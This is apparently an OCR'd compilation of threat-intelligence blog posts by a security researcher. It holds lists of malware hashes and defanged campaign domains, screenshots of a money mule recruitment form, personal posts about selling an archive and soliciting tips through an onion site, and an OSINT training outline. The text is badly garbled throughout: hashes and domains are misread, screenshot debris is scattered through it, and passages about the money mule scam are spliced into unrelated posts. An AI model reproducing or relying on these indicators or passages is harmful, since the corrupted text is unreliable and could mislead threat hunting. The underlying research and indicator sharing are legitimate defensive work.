aa59171b96270032452f8d6655634376ab0fb4d65f709e917a2569a95535e0d7 
a9ee2c31cdb6ldbeddd498f7ea24af51la8f6d0ee81ebf346996c333626285cdd 
aaf89a4594696686191e6930aaacd16c58dea24e6705362361b94d3e81207e56 
aaa8d973fe38ffb29a1f901b0e705c225246ef72f95b7d9beb21d10e4e776416 
a6flb5c96f861ca2e98e830d1lefff322b1078f2dc26e9ecabd51c83b21f47b90 
a3abb006fde836ab57373e1c70ba20439e7a7c30b2958d4cllelbc9f25f09922 
a900edd4b551e2ac1cd599bcc3928b34c072961423ed7cdeecb92de0b7a2b99d 
a86e9315d8716667098515716ad24a1468d3173b0a4a4e92402d9e5b0d68ccec 
afbcOcd6bcde9e837bcbbb71630859184e3fb9325312d937c72ab8216509e74b 
ae3a35bc49909868194237aca4b6edc5b188065dda5372c6c2ddd0ala424e473 
b070c911bfc1e019046c7e5bfee6147285724a63a46e0a3d0623b9e2fb7bc9a6 
afe10e980bb98b3916c63cacd114bebe8d7c5b31957323ab1e06fc91b11d0fc6 
abffc9d0499764323d79653befb7806afe169429al16bd48de0c938a24c16f51c 
ab9136e1ce9ca49c60a2c2638a316836bd43271417eee640c4701f5610fc53b1 
ad1814f5207812b0fc64c66f4535a428c7f818f8af3fabclfo8ac4edd123dbd1 
acbd08888dd94d3fa9e730875880c5130ea6dc0a2bac8711e7877846a68783ea 


32792571cc8c425ba87221497f173cff7e39807dd0f9ded92b01be1615d7c49c 
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3145f0d9ebb497c8a0003d589calf6cdcd7ee012a8fa57c5fcb3f42e85b626d3 
34f05f3177332221aae694a45f36b685cdd7fd5a37f760c9e925defc2ea0061b 
32e76040094ce4892c17fd476e469e08f31d0b298449a779ebec8b02c40aa818 
2e3133f2dfdf9c592bee8bef1f303381a36bfc1d7296d9b3c387a544b6daeecb 
2e1d9b1624f37d73f7c21e5db10cb3f1e011d03f6463ca03347400e8a55eb3a6 
31398e609c7ba646f68de56a301fb0ab437fb5422a63f0F7 e6b0f2c1a4606955 
30aa7971ca8a4000aaa7d284b102c4a5a3f4cbf734a1e90771e622f065ce3fdb 
3d8f3f952786dd25ad89a019ad725a166333d5flla4ca9alea03f43158faa5a7 
3ba7666622dbdd39037329ddee346fa850f5a22650ba92717e90f0a24bca0b27 
430403239f13cf2367082fbe1969347fb226e45732e7420d89cc4c192f514ded 
40ee5ddce83a99d3f9072172e39dff685c4b2ab49f64c429bace120db984c200 
3723832d339644f1ea0d331791872c6168c232b2132b3fc1495b1e4404994213 
36272f72865f74b7385e9ed79e6f314151c6637f59676fc8baf706752c816f05 
37a839bedca315879ba635a97af3f8a2039de97b79ceb8a8213e27d9305ee129 
3753fablleea24eed3dc384c9aae2dc0bd931f2128e91b7b277e63ab6dc0f5a7d 
1¢c211064b40aa51849e78008547526286d99357b805a841e3e5027aa7db6aee02 
1a279e5017ac83cca03536c6b3cOfad04e0e949ddald74c7d1258c5e98e9386c 
1f2de28a3cdaa3bc55116688fc2019b01e0c034910115c2f41f68540003db78d 
1cadf31404272245aa2979d30f62765407322029d6851b5cdcf5e4d6580eb8ac 
16413eb5b6d2a703e05dab91f8bc166ff0e9d95bb548cfhefaef6cfaf9ea7584 
1282e5d508ff649a76dd784f665cee595b5a90b5c41058fffd83bfea782ef8al 
19177358a3712e6e04ff62829f1cf2abd638ca2446b9791a37291864b607e9b1 
16e9f538cc8d3c9917423deef8bb918338bc9d6583834c35d32113baad9cf953 
2aae562f3467ca07004a75489ceb9c4a914cd549bdcf42e3c172ae0e337f6351 
2959070db750aede0c90c8fbb5da0558e6a96c2f360414547fd6f8379a744812 
2ccef30aa7048da238ae85b8e358db2cdf2a50690c34947 7f88bcd4701b34671 
2b67351c4975b6df7d05baa53eaf0a47ff7ef3d5a8e3884850aa38838ae256413 
20395 76ef6df56d36dc287fc74a4d352e50376f68909c3f332b782a0cb767d42 
1f4e7d11fc15591790d0cf43bf4b8a169829d843af83ddfle75bc892411113bd 
26146e7be6569d40614720fb829a0601b0e3e53d6af26f3ea60cb4cb28b1945e 
22c9a7487e6bf48aabb18fb78764c32241d73cdcade83fdef03451d2579371b1 
60ed7ca01be7d563010e5930c51efe005852f3b7a95f32403f3677d29f32b38c 
5fdcd073a0e0588e4363cf44115f2d62d900744e2 7ac12c54a18af28b5c3803f 
6618359d4d19997728359453b0598be7562c293ef9d6ac51f2635586096a52bd 


634438b9253b789f3b49ff4e437alec7960dee685e0eac4cbOdc68cfO20cf0la 
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5b3a8ff94b27ba20933e4850821591f20b6c1bf2d9141bb3870d81b8a457ed83 
5aa3ea58895c442d5d9dc019e4743b75da96d6cc2b4c65f9946644af8d0ffe61 
5efa03260e92181963f9137b046388978dbb0c4cd85910a33fe6f7eb7cf48628 
5db6f84201b56fa441836c88f138893aaa93d302a1574537be9f2bedc75eab35 
6cf9956079ff9285df534da801e3ad0e43a37b0813dd9393cf4d5d9deffe60df 
6b6a22bce6142c3f55ca94d6e22f20416d20aa3502302986a9e921ca4c686745 
6e7b28f76341f9074e49ffe9a88be9c4d2d0ba8c078da85fdb780fef5ce645a0 
6df9ea80061403440526a8ea964230a9ea7ce2edal9b23223dc00b9a2b367ae4 
696429702b4b4175596863bc3d9d86ea08b0a98c68F84e0264c82c223b4cb179 
68e4a9a758cdla2aelee92fe551e701f34dfc4f2979138f79390eeb13698a625 
6a502be25b7f6482c2b75d98014402de126eca8b455fe8ca922dd756a7c344c8 
6a0b87f77ee8fd51aad3e485958f21353483b78bb718ef08fabd6a7ee9f99bac 
49959fe7d6a90c480c86ffd99b3a0bd9e849d30825a317dbb17129440cl1la7fd8 
4719a64be3539c45a2e4fa36aadd93b6247e0fe8ed06aaef51e7918bddb78748 
4c16eea54a6011ab7159b5e418041caf5ccf0193857cc573a110c697ef4413f5 
4b4ee0649b719ce5a14b63c9b3a7f7bc0878b530ad158f9c2a04c3dd8b015af4 
447c2096ea44149f4428ffd688ff2d812cb976a57ea018455a17d4eb7b0727b5 
4334940b8b20457a8202407clafcfad89fe207a58d9e4df431c164b1b9513864 
4706f444c6fa954431a345f9008205091ece3603f84ae67b2b0b745e21529f96 
45a31a34dd3069de30f6ce7 7ebae0a5756613fa50bf2dladd8bef089e0e1e9b4 
5905e6c3fa0157d6178504b1a258b659c22e2d2d6c868f95dd25370d01e5902d 
577276e06dc5f5ad64003ee100179b69e7b8bfdal45e2fa314e04feae264933e 
59aa46ee3b1593b86dc8cf2c95d63d3a61167c95de664c800c6ebb86a3a476f2 
5910cb0c3dee7c74728eb955000a2c1b300898ff3358d689bfaa6cd5e9231c19 
4f8531775aef24138b54c6f416dfd19fb8b7e0be32ba200972a833dalf17felb 
4dea51cf62546adf2ed17b0b058888d42d8df93d6cf2682cae20352db1e61236 
5101b352d1d09de8d0dcbfc977fa5a486cb173f2d327451ba50c6280ac7a9c37 
4fa5ba282f37f16f1326cec81d1a7d474921b4160ae618e08a1195b8ea6f07a7 
Dots dots dots. 

snowyowl@jpnsec[.]com - 

hxxp://applyinfo[.]org - [9]DarkHotel Cyber Espionage related email. 
hxxp://anteph[.Jorg - [10]PushDo malware campaign affiliated email 
hxxp://darkhero[.Jorg - [11]Threat Group 3390 Cyber Espionage related email 
hxxp://googmail[.Jorg - [12]Uyghur Targeted Malware campaign related email 
hxxp://update-onlines[.]Jorg - [13]Threat Group 3390 Cyber Espionage related email 
Sample photos include: 
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Sample screenshots include: 
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videototal.net 


os 


95ee6379cb6e3 d582106 112948ceab51 


ipeontrel.org 


’ y 


08-26 03:40:32 UTC 2017-06-07 18:10:17 UTC 2014-05-27 03:45:20 UTC 201405-27 


ipeentrol.cig 
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xsidmt@j163.cn 


wjuci.com xjbtwy.com 
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68 db244325 ab 164e 15adb9a160ff2c2a 2489507 e896 acbO8fa7 eec31a2760a23 
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pingeontrol.com 


vy v 
2017-06-19 00.00.00 UTC 2017-06-22 00:00:00 UTC 2016-12-10 00:00:00 UTC 2016-12-10 00:00:00 UTC 2014 10:29 00:00:00 UTC 2013-11-27 00:00:00 UTC 2014.10.29 00.00 


an 


pingcontiol.com pingcomtrol com 


ghetasim@gherasim net 


tracecontrol.net 


v 


pingcentrel.com 


v v v v 


pingcontrol.com 


pingcontrol.com pingcontrel.com pingcontiol. 
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jose@webcontrolmuttimedia.com 
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massive-groupsvc .cc 
premier-groupinc .cn 
premier-groupnet .cn 
prime-groupco .cn 
prime-groupinc .cn 
puritan-groupinc .com 
redeye-groupco .cn 
redeye-groupinc .cn 
regency-groupco .cn 
regency-groupco .com 
regency-groupnet .cn 
saturn-groupsvc .cn 
saturn-groupsvc .com 


vision-groupinc .cn 


DNS servers of notice: 
ns2.dummykeath .cc 
ns2.theblackend .cn 
ns1.full-controll .cc 
ns3.geniouspartner .cn 
ns3.theblackend .cn 


ns1.party-reunite .cc 


ns2.bubble-preorder .info 


nsl1.windcontrol .cc 


ns3.diamond-dream .cc 
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jose@webcontrolmultimedia.com 


4am) 
@) 


activosenrenta.com vmcontrol.com spainsfain.com 


¥ x 
Oy @®) OF 
Sx ‘4 @ 
ipcontrol.org pingcontrol.com fatagallery.net 
v Vv 
Oo 
y) 
tracecontrol.net clavedifusa.com 
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v v vy 
-01-09 00:00:00 UTC 2017-06-22 00:00:00 UTC 2017-06-19 00:00:00 UTC: 


|| a | a 


pingcontrol.com pingcontrol.com pingcontrol.com 
ll Ack Regktaite xi! 
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v v 
OM.COM gherasim @gherasim.net 
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pingcontrol.com 


TC 2015-12-10 00:00:00 UTC 2013-11-27 00:00:00 UTC 2014-10-29 00:00:00 UTC 2014-10-29 00:00:00 UTC 2015-12-1 


| |) n_| J n_| J “ 


pingcontrol.com pingcontrol.com pingcontrol.com pingcontrol.com ping 


@ 
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Stay tuned! 
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5. https://malwarebreakdown. wordpress. com/2016/11/01/pushdo-checkin-traffic-update/ 


6. https://www.secureworks.com/research/threat- group-3390-targets-organizations-for-cyberespionage 
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19.4.6 I’m Back - Part Two (2023-04-13 19:54) 


(> Genail . inbox (338) - danche.daschevegmell.com . Windows leternet Explorer 
° oo ——— eee 
Fle Edt Wew Fevortes Too Help 


‘a Ace n yore CacaTa xax,a! Hrpad Cera Geanmams 


More ectees® = Refresh 


* & Dancho Danchev 


Search, add. or enate 


* levte a frend 


Jesus. Jesus or Cyber Jessus or it’s just a mentality? 
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If you can figure out what’s happening here you’ve probably figured out that this is me circa 
2010 trying to get "back to basics" online which in the context of meaning really means 
hard work a lot of socializing and distributing as much thoughts and random notes including 
hard-work driven research as possible to my fellow readers who greatly inspired me to con- 
tinue blogging and doing research on my personal blog including the usual volume of traffic 
that | get here from friends and colleagues from the industry including the U.S Intelligence 
Community and U.S Law Enforcement where it’s my pleasure and an honor to communicate 
my findings and research in my area of expertise to my readers and friends on a daily basis. 


[2] 


If a link is worth a thousand words try the following U.S Secret Server most wanted cybercrimi- 
nal which guess what with no laughing here is [3]AbdAllah one of my favorite Russian Business 
Network affiliates circa "back in the time”. 


[4] 
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Who wants to really help me fund my retirement fund is into collectables and memorabilia 
understands my "big picture" including the "big picture" and has BitCoin and wants to give 
me a hand here in exchange for something really personal which is my personal 20TB personal 
archive files from 2010 when | was on the top of my being popular game up to 2023 present day 
where I’m struggling with paying the bills working on part time OSINT projects? Keep reading. 


Did you know that if you’re a U.S Intelligence Community member doing cyber intelligence 
and possible research and stumble upon a "4PXFIL" or "EQBDJ4PXFIL" marking in terms of an 
email address account there’s a high probability that this is me and several other [5]online 
individuals doing "outsourcing SIGINT" also known as "fourth party exfil" for further campaign 
attribution and actually bothering to publicly "connect the dots" on major and high profile cyber 
attack campaigns where | was proud to participate in a [6]Top Secret GCHQ Program known as 
"[7]Lovely Horse" to monitor hackers online and on Twitter for technological know-how possible 
labeling them as 


[8] 
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& 
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a ay Dancho Danchey moe = 
‘nttps: sipldd suchen. blogspot.com = 
"Emails dancho, daachev@hush. com. 


wht. ar Se 


By the way for the record in case you still haven’t reached the online dazzlement stage check 
out the following screenshot and stay tuned for the actual details. The best is yet to come. 


1. 
2, hctps; / blogger. googleusercont ent .con/ ing/b/829Z2x1/ NVwksBi0~2h-UYOyiipU INGE gnP 604 V4xnaniDBiwHREIBB_v2 
Sep: //ne,ocreteericegpv/savetignion/nstente/ =o 


ttps://www.forbes. “com/sites/firewall/2010/08/06/bbhc- global-and-project-vigilant-wheres-the-money/ 


: ttps://cryptome.org/2015/02/gchq-lovely-horse-intercept- 15-0204. pdf 


7. https://s3.documentcloud.org/documents/1588694/who-else-is-targeting-your-target-collecting. pdf 


8. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsE jnTvia8MLAceJFpfdj8SiApa_OAbONoHU6-b9xvuU2Geb00 
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19.4.7 Auctioning Off? Think Twice and Show Your Support! (2023-04-24 17:12) 


COLLECTIBLE 


PT; 


LE “by. Dancho— Dapchey- cn zs 


“https: iplddauchan, blogspot.com. = 
--Eniait: itidancho, daachev@nush, com = 


7 + — Tiny, 
Pe: sae 


Surprise, surprise. 


Guess who’s selling out without being a sellout? 


[1] 
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Although many of you know and remember me from 2010-2013 with my research when | was on 
the top of my research and analysis game today’s harsh reality is that | think that I’m that very 
close to retiring and basically finding another venture to pursue possibly something in the lines 
of corporate cyber security investment portfolio and innovation management where | can be of 
great help where I’m currently busy paying the bills including a loan including to work on part 
time OSINT projects with great success where my primary goal would be to secure a financial 
pension and retirement fund in the context of auctioning off my 20TB personal files archive 
dating back to 2010 and 2023 for collectibles and memorabilia purposes where among my 
primarily long term projects would be to launch a training program in my line of work including 
to write a Second Edition of my personal memoir including to write several upcoming books. 


Stay tuned! 


1. https://blogger.googleusercontent.com/img/a/AVvXsEgpv7vG54wR1J9 jES5SCtEmE2eTRGFR_cVrkkQ7VcUK1Drw1iFzLRaUyXq- 
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jZmN j DXP9eRqCvhn8FBKpnVuovGhNBcR9h1z7g5vJog57tM6dgEk8 


19.4.8 Who Has Information on the Bad Guys and Wants to Share it with Me? 
(2023-04-24 18:23) 


[1] 


Submit Files or Messages 


Browse No files selected 


Dear blog readers, 


As of today I’m starting to do something that I haven’t really done in ages and probably never 
really did throughout my entire career which is to do my best to assist friends and colleagues 
including the appropriate Law Enforcement parties with research and knowledge on the bad 
guys which in this particular case would be to solicit information from my readers on current and 
emerging cyber threat actors from my readers using a Dark Web Onion which in this particular 
case Is: 


[2]http://3axk7cmmrvz5ynggt5of2qp5i7ifhfimInavv23ymm7en7ogjxe57jyd.onion 


Here’s what I’m looking for: 


¢ anything related to cyber intelligence in terms of currently active and ongoing campaigns 
including all the associated loCs that you can share and that you think | need to go through 
and work on based on your submission such as for instance raw cyber intelligence details 
on current and ongoing campaigns domains personally identifiable emails MD5s including 
anything that you think and believe might be worth working on in terms of what you’re 
sharing in terms of "processing" and enriching and working on reaching out to the appro- 
priate parties including the proper Law Enforcement parties involved in tracking down and 
prosecuting the cyber criminals behind these campaigns 
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ns.partnergreatest8 .net 


one.goldwonderful9 .info - the [39]command and control server used by the botnet managed 
by a money mule organization was using the same nameserver in May, 2009 


@2eq@2020°2Od 


Why are you gathering so much information about applicants? Such attention especially to bank account details puts me on guard. 


n fact ex instrument, which controls financial streams. The problem is that any transfer may 
be delayed t usiness. Transaction should be financial manager the 
seme we risk to lose c analyzng & cetails 
Selow we @ adie to prepare Cc Celays vile work ng with 


your bank. The success of our c 


“You are responsible for reliability of this information. If you're having any difficulties please contact your bank. 


Banking Details 
Account Type*: Personal v 
Bank Name*: 


Account Type (checking/saving)*: - select - v 


~~ 


Name on the Account*: 


Account Number*: 


yv oN 


Routing Number for ACH transfer*: 


Routing Number for Federal Wire 
Transfer": 


vy oN 


Date you opened your bank account*: 


How often do you use your bank 
account?*: 


~ 


Average amount of each operation*: 


Is it a prepaid account?*: 


Daily withdraval limit over the 
counter*; = 


Have you ever used Western 
Union/Money Gram?*: 


Are there Money Gram offices in your ? 


area?*: 
Back 


Once the end user falls victim into the recruitment scam, the entire process of registration and 
communication with the bogus organization takes place through a web-based interface where 
the potential money mules has to not only provide detailed personal data, but also, as much 
information as possible that would help the cybercriminals better achieve their objectives. 
For instance, the template for the money mule registration process includes a self-answered 
question which even the average user can get suspicious about - Why are you gathering so 
much information about applicants? Such attention especially to bank account details puts 
me on guard. 


The money mule recruitment organization is sticking to its professional tone, as usual, 
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* personally identifiable information on the bad guys which I'll do my best to share with the 
appropriate Law Enforcement party including friends and colleagues who can truly make 
an impact to track down and prosecute the bad guys based on their campaign activity 


Here’s what to expect in exchange: 


¢ always make sure to know that I’ll go through all the cyber intelligence loCs personally 
identifiable information on the bad guys malware and exploits serving domains and as- 
sociated MD5s including anything related to my line of work personally and will work to 
enrich and "process" your submission with the utmost professionalism as possible and as 
always. 


Stay tuned! 


1. https: //blogger.googleusercontent .com/img/b/R29vZ2x1/AVVXsEjGSf INfiLB7a14Nkp1rf cHP5nKQLLZ8uMprEVexzMd41JOX 
pxFf£LGm9xxn7MDX4KICgk35hU- YqnRaJytO5EBiP_iDY8v0Q5s7dA 
2. http: //3axk7 cmmrvz5ynggt5of 2qp5i7ifhfimlnavv23ymm7en7 ogjxe57 jyd. onion/ 


19.4.9 Happy Holidays From The (Not) Republic of Bulgaria - An Analysis - Part Four 
(2023-04-24 18:24) 


[1] 


[3]Dipshit. 
1. https: //linkedin.com/in/yavorkole 


2. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEg8Dnf vA7NVIgW9BDgrgI tOAoAYYxUgN Jso5G1QsWSEv2XxCQ 


yAuEbOnq- 1q0j Jt8RZemf 3508c2ukvNLef IR8SP6gRVSPY-KYLLSf£x 
3. https://linkedin. com/in/yavorkole 
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19.4.10 Upcoming DVD Training and Educational Research Compilation Release 
(2023-04-27 13:49) 


[1] 


Compilation - 2022 
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https Jiddanchev.blogspot.com 


ooeew os & 


| wanted to let everyone know that I’m going in deep research mode which means approxi- 
mately countless days of recording what appears to be my first DVD compilation in the context 
of reaching out to my readers and sharing my true story circa the 90’s up to present day where 
I'll do my best to record my idea as soon as possible and publish it [2]here. 


Sample screenshots include: 


[3] 
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[4] 


27165 


[5] 
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: 
. 
1. https://blogger .googleusercontent .com/img/b/R29vVZ2x1/AVvXsEgkHaEPxuZX4QA3PFnrsOMhI ImoGoBr3iwLe4Rip5kSw8aH. 
TSon8pT1iMbtOFtWreRFgRqJlavw-xCiFz2dznI7b3FRyyZzHygmB9 


2. heups://archive.org/devails/@ddanchev 
3, httpe:/ blogger. googleusercontent.con/ing/b/R8v22x1/AVeKsEifthe _AOLROWTAIZAZI02G00ge4q00Vh6G0gR, 2EoPosOTT 
4. 


5. https: //blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEg4ut BOCSLgwnQRUL61DaY5 j Osqs9tObY9thpdjgY-ez_EDH 


A4ed1x0B9ZZTPD-2zGLmZBMOqQmKuF q3y4wzccY46zR_PDfHkRZvy. 


19.4.11 My Memoir - In Bulgarian (2023-04-27 13:49) 


HH 


[1] 
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aTaKH/’B €BeTA 
"Toea e mone Ou nat-enuameanus beazapcKku b6Gaoznp 


é.tecmocéem mamab’’ sé chepama ha mexnuyecka 
Caepphocm"™ 


Did you know that | have a [2]memoir [PDF] written in Bulgarian? Did you also known that | 
have a two hours long free [3]audio book [MP3] in Bulgarian? Did you also know that you can 
also freely download my memoir in Bulgarian in various [4]E-Book [ePub] format readers for 


free? 


1. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEiZN9P_H2fnJcOJFyVWnTeMIIt1x6EzYHGtATRTtxSrTJ-tQ 


mCL47LQdN74qbwYnsqikK3YC300se51kZMT60H6J1GoNqYfrVvRnMA1 
2. https://archive.org/download/dancho-danchev-kiber-razuznavane-audio-kniga-01-memoar/Dancho_Danchev_Kiber 


_Razuznavane_Memoar_02.pdf 
3. https://archive.org/download/dancho-danchev-kiber-razuznavane-audio-kniga-01-memoar/Dancho_Danchev_Kiber 


_Razuznavane_Audio_Kniga_01.mp3 
4. https://archive.org/details/dancho-danchev-kiber-razuznavane-audio-kniga-01-memoar 
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19.4.12 Who Needs or Wants OSINT and Threat Intelligence Training? 


(2023-04-27 13:50) 
Ona 
‘a Individuals 


If anyone’s interested in advanced online OSINT and advanced online cyber threat actor profil- 
ing and threat intelligence training both individually or in group feel free to drop me a line at 
dancho.danchev@hush.com to discuss. 


This is the primary Table of Contents for the advanced OSINT training which I can offer: 


Introduction 

¢ Who is Dancho Danchev? 

¢ What are some of my current and future projects? 
¢ Basics of OSINT 

¢ Current State of the Cybercrime Ecosystem 


¢ Novice OSINT Tactics 


Advanced OSINT Tactics 


¢ Fighting Cybercrime in the Context of Using OSINT 


Threat Intelligence Gathering in the Context of Using OSINT 


Technical Collection in the Context of Using OSINT 
¢ Cyber Attack Attribution in the Context of Using OSINT 


Threat Intelligence Enrichment in the Context of Using OSINT 
¢ Cybercrime Research and Enrichment in the Context of Using OSINT 


¢ Practical OSINT Advices 


Case Study on Fighting Cybercrime Using OSINT 


Case Study 


First Case Study 
*« Second Case Study 
¢ Third Case Study 
¢ Fourth Case Study 
¢ Fifth Case Study 


* Conclusion 
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This is the primary Table of Contents for the advanced threat intelligence training: 


Introduction 

Overview 

Threat Intelligence Methodologies 

Proactive Threat Intelligence Methodologies 

The Future of Threat Intelligence 

Basics of Threat Intelligence 

Current State of the Threat Intelligence Marketplace 
Current State of the Threat Intelligence Ecosystem 

Novice Threat Intelligence Concepts 

Advanced Threat Intelligence Concepts 

Fighting Cybercrime in the Context of Using Threat Intelligence 
Using OSINT in the Context of Threat Intelligence Gathering 


Threat Intelligence in the Context of Using Technical Collection for Cyber Threat Actor 
Attribution Attacks 


Threat Intelligence in the Context of Cyber Attack. Attribution 
Threat Intelligence Enrichment in the Context of Using OSINT 


Cybercrime Research and Threat Intelligence loC (Indicator of Compromise) Enrichment 
in the Context of Using OSINT 


Practical Threat Intelligence Advices 
Case Study on Fighting Cybercrime Using Threat Intelligence 
Case Study 


First Case Study - The Basics of Starting Into Threat Intelligence for Beginners - A Practical 
Case Study 


Second Case Study - Advanced Threat Intelligence Practices Concepts and Methodologies 
- A Practical Case Study 


Third Case Study - Does the "Aggregate and Forget" Methodology Really Work in the Field 
of Threat Intelligence? - A Practical Case Study 


Fourth Case Study - The Basics of Launching and Maintaining and Operating a Company 
Wide Threat Intelligence Program for Beginners - A Practical Case Study 


Fifth Case Study - Advanced Operation and Maintaining of a Company Wide Threat Intelli- 
gence Program for Advanced Users - A Practical Case Study 
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¢ Sixth Case Study - How to Train Your Threat Intelligence Analysts to be Security Industry’s 
and Analytical and Technical Rock Stars? - A Practical Case Study 


¢ Seventh Case Study - How to Convert Your Company Employee Endpoints Into a Dis- 
tributed Threat Intelligence Passive and Active Threat Intelligence Gathering Sensor? - 
A Practical Case Study 


¢ Eight Case Study - How To Convert Your Clients Into a Passive and Active Distributed Threat 
Intelligence Gathering Sensors? - A Practical Case Study 


¢ Ninth Case Study - How to Utilize Public and Proprietary Threat Intelligence Databases for 
Cyber Threat Actor Attribution Campaigns Including Cross Reference and Cross Checking 
of 


¢ Tenth Case Study - How to Enrich Your Company Wide loCs (Indicators of Compromise) 
Using Public and Proprietary Sources and Connect the Dots on a Major Cyber Attack and 
Cyber Threat Actor Campaign 


* Conclusion 


And here’s a sample introduction for the OSINT training which I can offer with the idea to get 
you to know the actual style of the training: 


Basics of OSINT in the Context of Fighting Cybercrime - The Definite Beginner’s Guide 


“What use are they? They’ve got over 40,000 people over there reading newspapers.” - Presi- 
dent Nixon 


This introductory guide into the world of OSINT is part of an upcoming series of articles aiming to 
assist both novice and experienced security practitioners including analysts for the purpose of 
entering the world of OSINT for cybercrime research and aims to offer a high-profile and never- 
published before practical and relevant in today’s nation-state and rogue cyber adversaries 
Internet and cybercrime ecosystem whose purpose general overview and introductory material 
and training course material for novice beginners including advanced Internet users hackers 
security consultants analysts including researchers who are interested in exploring the world 
of OSINT (Open Source Intelligence) for the purpose of making a difference doing their work in 
a better and more efficient way including to actually be fully capable and equipped to catch 
the bad guys online including to monitor and track them down to the point of building the big 
picture of their fraudulent and rogue online activities. The course including the actual learning 
and training material is courtesy of Dancho Danchev who is considered one of the most popular 
security bloggers threat intelligence analysts and cybercrime researchers internationally and 
within the security industry. 


The primary purpose behind this guide is to summarize Dancho Danchev’s over a decade of 
active passive and active including actionable threat intelligence and OSINT research type of 
experience including cybercrime research type of experience where the ultimate goal would 
be to empower the student or the organization taking this course into better doing their online 
research work including to be fully capable of tracking down and monitoring the rogue and 
malicious online activities of the bad guys online where the ultimate goal would be to better 
position and enhance your cyber attack or malicious threat actor cyber campaign attribution 
skills ultimately improving your work activities and actually empowering you to learn how to 
do OSINT for good and most importantly to track down and monitor the bad guys. 


Introduction 
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In a world dominated by sophisticated cybercrime gangs and nation-state sponsored and toler- 
ated rogue cyber actors the use of OSINT (Open Source Intelligence) is crucial for building the 
big picture in the context of fighting cybercrime internationally including to actually "connect 
the dots" in the context of providing personally identifiable information to a closed-group and 
invite-only LE community including international Intelligence Agencies on their way to track 
down and prosecute the cybercriminals behind these campaigns. 


In this training and learning material Dancho Danchev one of the security industry’s most 
popular and high-value security blogger and cybercrime researcher will offer an in-depth peek 
inside the world of OSINT in the context of fighting cybercrime and will provide practical advice 
examples and case in particular on how he tracked down and shut down the infamous Koobface 
botnet and continued to supply never-published and released before potentially sensitive and 
classified information on new cyber threat actors which he continued to publish at his Dancho 
Danchev'’s blog. 


Basics of OSINT 


OSINT in the context of fighting cybercrime can be best described as the systematic and persis- 
tent use of public information for the purpose of building a cyber threat intelligence enriched 
data sets and intelligence databases both for real-time situational awareness and historical 
OSINT preservation purposes which also include to actually "connect the dots" in cybercrime 
gang and rogue cyber actor campaigns and cyber attack type of campaigns. A general ex- 
ample would consist of obtaining a single malicious software sample and using it on a public 
sandbox to further map the infrastructure of the cybercriminal behind it potentially exposing 
the big picture behind the campaign and connecting the dots behind their infrastructure which 
would lead to a multi-tude and variety of personally identifiable information getting exposed 
which could help build a proprietary cybercrime gang activity database and actually assist LE 
in tracking down the prosecuting the cybercriminals behind these campaigns. 


"There’s no such thing as new cyber threat actors. It’s just new players adopting economic 
and marketing concepts to steal money and cause havoc online." 


The primary idea here is to locate free and public online repositories of malicious software and 
to actually obtain a sample which will be later on used in a public sandbox for the purpose of 
mapping the Internet-connected infrastructure of the cybercrime gang in question including to 
actually elabore more on the ways they attempt to monetize the access to the compromised 
host including possibly ways in which they make money including to actually find out what 
exactly are they trying to compromise. Possible examples here include VirusTotal or actually 
running a malware interception honeypot such as for instance a spam trap which would allow 
you to intercept currently circulating in the wild malare campaigns that propagate using email 
and actually analyze them in terms of connecting the dots exposing their Internet-connected in- 
frastructure and establishing the foundations for a successful career into the world of malicious 
software analysis and cybercrime research. 


"Everything that can be seen is already there". 


The next logical step would be to properly assess and analyze the recently obtained sample and 
to properly establish the foundation of a "connect the dots" culture within your organization 
where the primary goal would be to have researchers and analysts look for clues on their way 
to track down and monitor a specific campaign potentially coming up with new and novel cyber 
attack attribution research. Visualization is often the key to everything in terms of visualizing 
threats and looking for additional clues and possible cyber attack attribution clues where a 
popular visualization and threat analysis tool known as Maltego should come into play which 
basically offers an advanced and sophisticated way to process OSINT and cybercrime research 
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and explains that: 


"In fact that modern financial system is a complex instrument, which controls financial 
streams. The problem is that any transfer may be delayed (from 1 to 5 days) but it is 
unacceptable for our business. Transaction should be completed by a financial manager the 
same day money is deposited into the bank account. Otherwise, we risk to lose money, 
clients, reputation. Analyzing all the details below we’ll be able to prepare tasks 
for every agent individually. Please fill in all the fields carefully to avoid delays while 
working with your bank. The success of our cooperation depends on the accuracy of entered 
details! Please be serious." 


@2=O@2O02O020 


I confirm that I have contacted my bank directly and verified that: 


([]_ my banking information (Account and Routing numbers) are correct. 
oO my daily withdrawal limit is in fact $10,000. 
oO my current account listed is active, as it may become inactive due to inactivity. 


Oo my account is able to receive funds on daily basis in the amount of $10,000. 


In addition I certify that: 


oO there is a branch of my bank located in my city/tovwm and I am able to get there soon after task 
receipt. 


oO there are Western Union and Money Gram locations in my city/town and I am aware of their exact 
addresses. 


Next Step Back 


*If you have any doubts or concerns to the above statements, please post-pone your registration until all of the information is 
verified. You carry full liability for providing falsified information. 


**Please bear in mind the Confidentiality Clause in your Agreement when contacting outside parties for information. 


It gets even more interesting when the recruitment organization starts starts exposing itself 
as a cybercrime-facilitating enterprise, asking questions that only such an organization 
needs to known the answers to, due to operational security (OPSEC) and due to their clear 
understanding of the time value of money ([40]Microsoft study debunks profitability of the 
underground economy), well stolen money in particular. For instance, the built-in registration 
checks speak for themselves: 
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and threat intelligence type of information and actually enrich it using public and proprietary 
sources of information for the purpose of establishing the big picture and actually connecting 
the dots for a specific cyber attack campaign. 


Among the first things that you should consider before beginning your career in the World 
of OSINT is that everything that you need to know about a specific online event a specific 
online campaign that also includes the activities of the bad guys online is already out there 
in the form of publicly accessible information which should be only processed and enriched 
to the point where the big picture for a specific event or a malicious online campaign should 
be established using both qualitative and quantitative methodologies that also includes the 
process of obtaining access to the actual technical details and information behind a specific 
online event or an actual malicious and rogue online campaign. 


Among the few key things to keep in mind when doing OSINT including actual OSINT for cyber 
attack and cyber campaign attack attribution is the fact that in 99 % of the cases all the col- 
lection information that you need in terms of a specific case is already publicly known and is 
publicly accessible instead of having to obtain access to a private or a proprietary source of 
information and the only thing that you would have to do to obtain access to it is to use the 
World’s most popular search engine in terms of collection processing and enrichment. 


The second most popular thing to keep in mind when doing OSINT is that you don’t need to 
obtain access to proprietary even public OSINT tools. 


Current State of the Cybercrime Ecosystem 


In 2021 a huge number of the threats facing the security industry including vendors and orga- 
nizations online include RATs (Remote Access Tools) malicious software part of a larger bother 
malicious and fraudulent spam and phishing emails including client-side exploits and vulner- 
abilities which have the potential to exploit an organization or a vendor’s end points for the 
